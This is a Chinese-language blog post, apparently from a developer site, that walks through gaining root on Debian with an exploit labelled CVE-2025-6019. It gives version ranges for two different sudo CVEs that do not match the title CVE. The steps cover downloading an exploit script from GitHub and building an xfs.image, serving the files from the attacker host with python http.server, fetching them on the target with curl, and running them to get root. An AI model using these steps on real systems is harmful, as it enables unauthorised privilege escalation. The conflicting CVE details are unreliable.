linux sudo提权CVE-2025-6019需要两台debian系统的虚拟主机,一台主机也可以,普通用户可以做被攻击,root可以做攻击(忘记root密码可以修改试试)提权

先使用sudo -V 在目标主机查看版本

影响范围如下:
CVE-2025-32462:

1.9.0 <= sudo <= 1.9.17

1.8.8 <= sudo <= 1.8.32

CVE-2025-32463:

1.9.14 <= sudo <= 1.9.17

注意:Sudo 的旧版本(当前 <= 1.8.32)不易受到攻击,因为不存在 chroot 功能。

去该地址https://github.com/guinea-offensive-security/CVE-2025-6019下载exp(漏洞利用脚本)

将下载好的sh脚本放在攻击主机上

使用chmod +x给sh脚本执行权限,然后在攻击主机上使用root权限执行sh脚本

输入y,会提示一个报错,缺少xkfs.xfs,我们下载一下

使用apt install libglib2.0-bin xfsprogs该命令下载一下缺少的东西,在安装到98%时会卡一会,稍等一下

如果报错就使用apt update更新一下在下载

安装完之后再次执行sh脚本

输入y,然后输入l

就会在当前目录下生成一个xfs.image的一个文件

把xfs.image和exploit.sh上传到目标机中

使用python -m http.server 1234在攻击主机上开设一个端口

在被攻击主机执行curl http://攻击机ip:开设的端口,我这边开设的1234 (-o 是保存文件,后面跟的是保存后文件名字)

下载这两个文件,并赋予执行权限

在被攻击机上执行脚本,输入y和c,就拿到了root用户权限

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值